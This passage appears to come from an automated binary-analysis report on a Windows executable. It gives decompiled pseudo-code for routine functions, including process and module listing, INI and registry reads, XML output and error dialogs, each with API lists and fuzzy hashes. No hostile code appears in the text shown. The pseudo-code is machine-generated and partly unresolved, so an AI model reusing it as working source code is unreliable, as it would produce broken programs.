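                                                                                                                			}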









                                                                                                                APIs
                                                                                                                • wcscpy.MSVCRT ref: 0040AFD3
                                                                                                                • wcscat.MSVCRT ref: 0040AFE2
                                                                                                                • wcscat.MSVCRT ref: 0040AFF3
                                                                                                                • wcscat.MSVCRT ref: 0040B002
                                                                                                                • VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040B01C
                                                                                                                  • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                  • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                  • Part of subcall function 004049A2: lstrcpyW.KERNEL32 ref: 004049B7
                                                                                                                  • Part of subcall function 004049A2: lstrlenW.KERNEL32(?), ref: 004049BE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
                                                                                                                • String ID: \StringFileInfo\
                                                                                                                • API String ID: 393120378-2245444037
                                                                                                                • Opcode ID: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                                                • Instruction ID: 46c7c43bb965d9609608e4f6c2ae6b517043b349f439a100f6d085a340de75fe
                                                                                                                • Opcode Fuzzy Hash: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                                                • Instruction Fuzzy Hash: CF015EB290020DA6DB11EAA2CC45DDF776DDB44304F0005B6B654F2092EB3CDA969A98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintfwcscpy
                                                                                                                • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                • API String ID: 999028693-502967061
                                                                                                                • Opcode ID: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                                                • Instruction ID: fc2f6d5a95cb840c7437c23e5da9cc5f651b22c54dcbfaa02992beb3cb27aad2
                                                                                                                • Opcode Fuzzy Hash: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                                                • Instruction Fuzzy Hash: CDE08C31A94B00B5E96423418DC7F2B2801DE90B14FB0083BF686B05C1E6BDBA0528DF
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 35%
                                                                                                                			E004092F0(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
                                                                                                                				void* _v0;
                                                                                                                				intOrPtr _v4;
                                                                                                                				intOrPtr _v8;
                                                                                                                				unsigned int _v12;
                                                                                                                				void* _v16;
                                                                                                                				char _v20;
                                                                                                                				char _v24;
                                                                                                                				intOrPtr _v32;
                                                                                                                				intOrPtr _v36;
                                                                                                                				intOrPtr _v44;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				intOrPtr _t58;
                                                                                                                				void* _t59;
                                                                                                                				void* _t72;
                                                                                                                				intOrPtr _t78;
                                                                                                                				void _t89;
                                                                                                                				signed int _t90;
                                                                                                                				int _t98;
                                                                                                                				signed int _t105;
                                                                                                                				signed int _t106;
                                                                                                                
                                                                                                                				_t106 = _t105 & 0xfffffff8;
                                                                                                                				E0040B550(0x8874, __ecx);
                                                                                                                				_t98 = 0;
                                                                                                                				_a8 = 0;
                                                                                                                				if(E00404BD3() == 0 ||  *0x4101bc == 0) {
                                                                                                                					if( *0x4101b8 != _t98) {
                                                                                                                						_t89 = _a4;
                                                                                                                						_t58 =  *0x40f83c(8, _t89);
                                                                                                                						_v8 = _t58;
                                                                                                                						if(_t58 != 0xffffffff) {
                                                                                                                							_v0 = 1;
                                                                                                                							_a560 = 0x428;
                                                                                                                							_t59 =  *0x40f834(_t58,  &_a560);
                                                                                                                							while(_t59 != 0) {
                                                                                                                								memset( &_a8, _t98, 0x21c);
                                                                                                                								_a12 = _a580;
                                                                                                                								_a8 = _t89;
                                                                                                                								wcscpy( &_a16,  &_a1096);
                                                                                                                								_a540 = _a576;
                                                                                                                								_t106 = _t106 + 0x14;
                                                                                                                								_a544 = _a572;
                                                                                                                								_a552 = 0x428;
                                                                                                                								if(E00409510(_a8,  &_a8) != 0) {
                                                                                                                									_t59 =  *0x40f830(_v16,  &_a552);
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                								goto L18;
                                                                                                                							}
                                                                                                                							goto L18;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t72 = OpenProcess(0x410, 0, _a4);
                                                                                                                					_v0 = _t72;
                                                                                                                					if(_t72 != 0) {
                                                                                                                						_push( &_a4);
                                                                                                                						_push(0x8000);
                                                                                                                						_push( &_a2160);
                                                                                                                						_push(_t72);
                                                                                                                						if( *0x40f840() != 0) {
                                                                                                                							_t6 =  &_v12;
                                                                                                                							 *_t6 = _v12 >> 2;
                                                                                                                							_v8 = 1;
                                                                                                                							_t90 = 0;
                                                                                                                							if( *_t6 != 0) {
                                                                                                                								while(1) {
                                                                                                                									_a1616 = _t98;
                                                                                                                									memset( &_a1618, _t98, 0x208);
                                                                                                                									memset( &_a8, _t98, 0x21c);
                                                                                                                									_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
                                                                                                                									_t106 = _t106 + 0x18;
                                                                                                                									_a8 = _a4;
                                                                                                                									_a12 = _t78;
                                                                                                                									 *0x40f838(_v16, _t78,  &_a1616, 0x104);
                                                                                                                									E0040920A( &_v0,  &_a1600);
                                                                                                                									_push(0xc);
                                                                                                                									_push( &_v20);
                                                                                                                									_push(_v4);
                                                                                                                									_push(_v32);
                                                                                                                									if( *0x40f844() != 0) {
                                                                                                                										_a508 = _v32;
                                                                                                                										_a512 = _v36;
                                                                                                                									}
                                                                                                                									if(E00409510(_a8,  &_v24) == 0) {
                                                                                                                										goto L18;
                                                                                                                									}
                                                                                                                									_t90 = _t90 + 1;
                                                                                                                									if(_t90 < _v44) {
                                                                                                                										_t98 = 0;
                                                                                                                										continue;
                                                                                                                									} else {
                                                                                                                									}
                                                                                                                									goto L18;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						L18:
                                                                                                                						CloseHandle(_v16);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _a8;
                                                                                                                			}
























                                                                                                                0x0040941d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00409423
                                                                                                                0x00409428
                                                                                                                0x00409375
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040942e
                                                                                                                0x00000000
                                                                                                                0x00409428
                                                                                                                0x00409377
                                                                                                                0x0040936d
                                                                                                                0x004094fb
                                                                                                                0x004094ff
                                                                                                                0x004094ff
                                                                                                                0x00409337
                                                                                                                0x0040950f

                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00408CE3,00000000,00000000), ref: 0040932B
                                                                                                                • memset.MSVCRT ref: 0040938D
                                                                                                                • memset.MSVCRT ref: 0040939D
                                                                                                                  • Part of subcall function 0040920A: wcscpy.MSVCRT ref: 00409233
                                                                                                                • memset.MSVCRT ref: 00409488
                                                                                                                • wcscpy.MSVCRT ref: 004094A9
                                                                                                                • CloseHandle.KERNEL32(?,00408CE3,?,?,?,00408CE3,00000000,00000000), ref: 004094FF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 3300951397-0
                                                                                                                • Opcode ID: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                                                • Instruction ID: b0ac5d6e05c2becfea0857ee93370de63ec0533c429aeeb167529e34c4b0c205
                                                                                                                • Opcode Fuzzy Hash: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                                                • Instruction Fuzzy Hash: AE512A71108345ABD720DF65CC88A9BB7E8FFC4304F404A3EF989A2291DB75D945CB5A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 44%
                                                                                                                			E00402EC8(void* __ebx) {
                                                                                                                				struct tagRECT _v20;
                                                                                                                				struct tagPAINTSTRUCT _v84;
                                                                                                                
                                                                                                                				GetClientRect( *(__ebx + 0x10),  &_v20);
                                                                                                                				_v20.left = _v20.right - GetSystemMetrics(0x15);
                                                                                                                				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
                                                                                                                				asm("movsd");
                                                                                                                				asm("movsd");
                                                                                                                				asm("movsd");
                                                                                                                				asm("movsd");
                                                                                                                				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
                                                                                                                				return EndPaint( *(__ebx + 0x10),  &_v84);
                                                                                                                			}






                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 19018683-0
                                                                                                                • Opcode ID: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                                                • Instruction ID: c8721ad6730a543cd54d50ae751cb56b62cc93be397439d4b1c9778783e315ec
                                                                                                                • Opcode Fuzzy Hash: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                                                • Instruction Fuzzy Hash: 8C01EC72900218EFDF04DFA4DD859FE7B79FB44301F000569EA11AA195DA71A904CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 50%
                                                                                                                			E004079A4(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                				void _v514;
                                                                                                                				signed short _v516;
                                                                                                                				signed short* _t34;
                                                                                                                				signed int _t37;
                                                                                                                				void* _t40;
                                                                                                                				signed short* _t44;
                                                                                                                				void* _t46;
                                                                                                                
                                                                                                                				_t40 = __edi;
                                                                                                                				E00407343(__edi, _a4, L"<item>\r\n");
                                                                                                                				_t37 = 0;
                                                                                                                				if( *((intOrPtr*)(__edi + 0x2c)) > 0) {
                                                                                                                					do {
                                                                                                                						_v516 = _v516 & 0x00000000;
                                                                                                                						memset( &_v514, 0, 0x1fc);
                                                                                                                						E0040ADF1( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x60))),  *((intOrPtr*)(__edi + 0x64)));
                                                                                                                						_t44 =  &_v516;
                                                                                                                						E00407250(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x40)) + 0x10)));
                                                                                                                						_t34 = _t44;
                                                                                                                						_push(_t34);
                                                                                                                						_push( *((intOrPtr*)(__edi + 0x64)));
                                                                                                                						_push(_t34);
                                                                                                                						_push(L"<%s>%s</%s>\r\n");
                                                                                                                						_push(0x2000);
                                                                                                                						_push( *((intOrPtr*)(__edi + 0x68)));
                                                                                                                						L0040B1EC();
                                                                                                                						_t46 = _t46 + 0x24;
                                                                                                                						E00407343(__edi, _a4,  *((intOrPtr*)(__edi + 0x68)));
                                                                                                                						_t37 = _t37 + 1;
                                                                                                                					} while (_t37 <  *((intOrPtr*)(__edi + 0x2c)));
                                                                                                                				}
                                                                                                                				return E00407343(_t40, _a4, L"</item>\r\n");
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004079DB
                                                                                                                  • Part of subcall function 0040ADF1: memcpy.MSVCRT ref: 0040AE6E
                                                                                                                  • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                                                  • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                                                • _snwprintf.MSVCRT ref: 00407A25
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                • API String ID: 1775345501-2769808009
                                                                                                                • Opcode ID: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                                                                • Instruction ID: c8ba369f0531ab1f4cd0c6f6a7ba1592bf00f2a9533aec28b16f0bdd84d8fa76
                                                                                                                • Opcode Fuzzy Hash: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                                                                • Instruction Fuzzy Hash: 3D119131A40219BFDB21AB65CC86E5A7B25FF04308F00006AFD0477692C739B965DBD9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 64%
                                                                                                                			E0040467A(void* __edi) {
                                                                                                                				signed int _v8;
                                                                                                                				void* _v12;
                                                                                                                				void* _v16;
                                                                                                                				void _v2062;
                                                                                                                				short _v2064;
                                                                                                                				int _t16;
                                                                                                                
                                                                                                                				_v8 = _v8 & 0x00000000;
                                                                                                                				_t16 = E004043F8( &_v12, 0x20019);
                                                                                                                				if(_t16 == 0) {
                                                                                                                					_v2064 = _v2064 & _t16;
                                                                                                                					memset( &_v2062, _t16, 0x7fe);
                                                                                                                					_push(__edi + 0x20a);
                                                                                                                					_push(L"%s\\shell\\%s");
                                                                                                                					_push(0x3ff);
                                                                                                                					_push( &_v2064);
                                                                                                                					L0040B1EC();
                                                                                                                					if(RegOpenKeyExW(_v12,  &_v2064, 0, 0x20019,  &_v16) == 0) {
                                                                                                                						_v8 = 1;
                                                                                                                						RegCloseKey(_v16);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _v8;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004046AF
                                                                                                                • _snwprintf.MSVCRT ref: 004046CD
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpen_snwprintfmemset
                                                                                                                • String ID: %s\shell\%s
                                                                                                                • API String ID: 1458959524-3196117466
                                                                                                                • Opcode ID: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                                                                • Instruction ID: 1855bd24da60c853c30f7b3e18bb60aca338c900c60696cbbcdbf1fba26ecf92
                                                                                                                • Opcode Fuzzy Hash: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                                                                • Instruction Fuzzy Hash: 20011EB5D00218FADB109BD1DD45FDAB7BCEF44314F0041B6AA04F2181EB749B489BA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 16%
                                                                                                                			E00409D5F(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
                                                                                                                				signed short _v131076;
                                                                                                                
                                                                                                                				_t25 = __esi;
                                                                                                                				E0040B550(0x20000, __ecx);
                                                                                                                				if(_a4 == 0) {
                                                                                                                					return GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24);
                                                                                                                				} else {
                                                                                                                					if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
                                                                                                                						_push(_a24);
                                                                                                                					} else {
                                                                                                                						_v131076 = _v131076 & 0x00000000;
                                                                                                                						_push(__esi);
                                                                                                                						_push(L"\"%s\"");
                                                                                                                						_push(0xfffe);
                                                                                                                						_push( &_v131076);
                                                                                                                						L0040B1EC();
                                                                                                                						_push(_a24);
                                                                                                                						_push( &_v131076);
                                                                                                                					}
                                                                                                                					return WritePrivateProfileStringW(_a8, _a12, ??, ??);
                                                                                                                				}
                                                                                                                			}





                                                                                                                APIs
                                                                                                                • wcschr.MSVCRT ref: 00409D79
                                                                                                                • _snwprintf.MSVCRT ref: 00409D9E
                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409DBC
                                                                                                                • GetPrivateProfileStringW.KERNEL32 ref: 00409DD4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                • String ID: "%s"
                                                                                                                • API String ID: 1343145685-3297466227
                                                                                                                • Opcode ID: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                                                • Instruction ID: cff84325bbeeabecfb89bf19508a3778b9d9768fc6139f0f3fcaa17558a1ecc1
                                                                                                                • Opcode Fuzzy Hash: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                                                • Instruction Fuzzy Hash: BA018B3244421AFADF219F90DC45FDA3B6AEF04348F008065BA14701E3D739C921DB98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 38%
                                                                                                                			E004047D2(long __ecx, void* __eflags, struct HWND__* _a4) {
                                                                                                                				char _v2052;
                                                                                                                				short _v4100;
                                                                                                                				void* __edi;
                                                                                                                				long _t15;
                                                                                                                				long _t16;
                                                                                                                
                                                                                                                				_t15 = __ecx;
                                                                                                                				E0040B550(0x1000, __ecx);
                                                                                                                				_t16 = _t15;
                                                                                                                				if(_t16 == 0) {
                                                                                                                					_t16 = GetLastError();
                                                                                                                				}
                                                                                                                				E00404706(_t16,  &_v2052);
                                                                                                                				_push( &_v2052);
                                                                                                                				_push(_t16);
                                                                                                                				_push(L"Error %d: %s");
                                                                                                                				_push(0x400);
                                                                                                                				_push( &_v4100);
                                                                                                                				L0040B1EC();
                                                                                                                				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(?,?,004035EB,?,?), ref: 004047E6
                                                                                                                • _snwprintf.MSVCRT ref: 00404813
                                                                                                                • MessageBoxW.USER32(?,?,Error,00000030), ref: 0040482C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastMessage_snwprintf
                                                                                                                • String ID: Error$Error %d: %s
                                                                                                                • API String ID: 313946961-1552265934
                                                                                                                • Opcode ID: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                                                • Instruction ID: 90e5118ee4f46ea14b6138c5fdcdbe0805ab296af9aaa7bfd3b1d45c15712702
                                                                                                                • Opcode Fuzzy Hash: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                                                • Instruction Fuzzy Hash: 30F08975500208A6C711A795CC46FD572ACEB44785F0401B6B604F31C1DB78AA448A9C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 90%
                                                                                                                			E004068EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
                                                                                                                				void* _v8;
                                                                                                                				signed int _v12;
                                                                                                                				void* __ebx;
                                                                                                                				void* __ecx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t74;
                                                                                                                				signed int _t76;
                                                                                                                				signed short _t85;
                                                                                                                				signed int _t87;
                                                                                                                				intOrPtr _t88;
                                                                                                                				signed short _t93;
                                                                                                                				void* _t95;
                                                                                                                				signed int _t124;
                                                                                                                				signed int _t126;
                                                                                                                				signed int _t128;
                                                                                                                				intOrPtr* _t131;
                                                                                                                				signed int _t135;
                                                                                                                				signed int _t137;
                                                                                                                				signed int _t138;
                                                                                                                				void* _t141;
                                                                                                                				void* _t142;
                                                                                                                				void* _t146;
                                                                                                                
                                                                                                                				_t142 = __eflags;
                                                                                                                				_push(_t102);
                                                                                                                				_t131 = __eax;
                                                                                                                				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x68))();
                                                                                                                				E00406746(__eax);
                                                                                                                				 *(_t131 + 0x38) =  *(_t131 + 0x38) & 0x00000000;
                                                                                                                				_t135 = 5;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x2a0)) = _a4;
                                                                                                                				_t124 = 0x14;
                                                                                                                				_t74 = _t135 * _t124;
                                                                                                                				 *(_t131 + 0x2d0) = _t135;
                                                                                                                				_push( ~(0 | _t142 > 0x00000000) | _t74);
                                                                                                                				L0040B26C();
                                                                                                                				 *(_t131 + 0x2d4) = _t74;
                                                                                                                				_t126 = 0x14;
                                                                                                                				_t76 = _t135 * _t126;
                                                                                                                				_push( ~(0 | _t142 > 0x00000000) | _t76);
                                                                                                                				L0040B26C();
                                                                                                                				_t95 = 0x40f008;
                                                                                                                				 *(_t131 + 0x40) = _t76;
                                                                                                                				_v8 = 0x40f008;
                                                                                                                				do {
                                                                                                                					_t137 =  *_t95 * 0x14;
                                                                                                                					memcpy( *(_t131 + 0x2d4) + _t137, _t95, 0x14);
                                                                                                                					_t24 = _t95 + 0x14; // 0x40f01c
                                                                                                                					memcpy( *(_t131 + 0x40) + _t137, _t24, 0x14);
                                                                                                                					_t85 =  *( *(_t131 + 0x2d4) + _t137 + 0x10);
                                                                                                                					_t141 = _t141 + 0x18;
                                                                                                                					_v12 = _t85;
                                                                                                                					 *( *(_t131 + 0x40) + _t137 + 0x10) = _t85;
                                                                                                                					if((_t85 & 0xffff0000) == 0) {
                                                                                                                						 *( *(_t131 + 0x2d4) + _t137 + 0x10) = E00405B81(_t85 & 0x0000ffff);
                                                                                                                						_t93 = E00405B81(_v12 | 0x00010000);
                                                                                                                						_t95 = _v8;
                                                                                                                						 *( *(_t131 + 0x40) + _t137 + 0x10) = _t93;
                                                                                                                					}
                                                                                                                					_t95 = _t95 + 0x28;
                                                                                                                					_t146 = _t95 - 0x40f0d0;
                                                                                                                					_v8 = _t95;
                                                                                                                				} while (_t146 < 0);
                                                                                                                				 *(_t131 + 0x44) =  *(_t131 + 0x44) & 0x00000000;
                                                                                                                				_t138 = 5;
                                                                                                                				_t128 = 4;
                                                                                                                				_t87 = _t138 * _t128;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x48)) = 1;
                                                                                                                				 *(_t131 + 0x2c) = _t138;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x28)) = 0x20;
                                                                                                                				_push( ~(0 | _t146 > 0x00000000) | _t87);
                                                                                                                				L0040B26C();
                                                                                                                				_push(0xc);
                                                                                                                				 *(_t131 + 0x30) = _t87;
                                                                                                                				L0040B26C();
                                                                                                                				_t139 = _t87;
                                                                                                                				if(_t87 == 0) {
                                                                                                                					_t88 = 0;
                                                                                                                					__eflags = 0;
                                                                                                                				} else {
                                                                                                                					_t88 = E00406607(_a4,  *((intOrPtr*)(_t131 + 0x58)), _t139);
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)(_t131 + 0x2c0)) = _t88;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x4c)) = 1;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x50)) = 0;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x2b4)) = 1;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x2b8)) = 0;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x2bc)) = 0;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x2c4)) = 1;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x2c8)) = 1;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x334)) = 0x32;
                                                                                                                				 *((intOrPtr*)(_t131 + 0x5c)) = 0xffffff;
                                                                                                                				return E0040686C(_t131);
                                                                                                                			}



























                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040692E
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040694A
                                                                                                                • memcpy.MSVCRT ref: 0040696D
                                                                                                                • memcpy.MSVCRT ref: 0040697E
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00406A01
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00406A0B
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                  • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                  • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                  • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                  • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
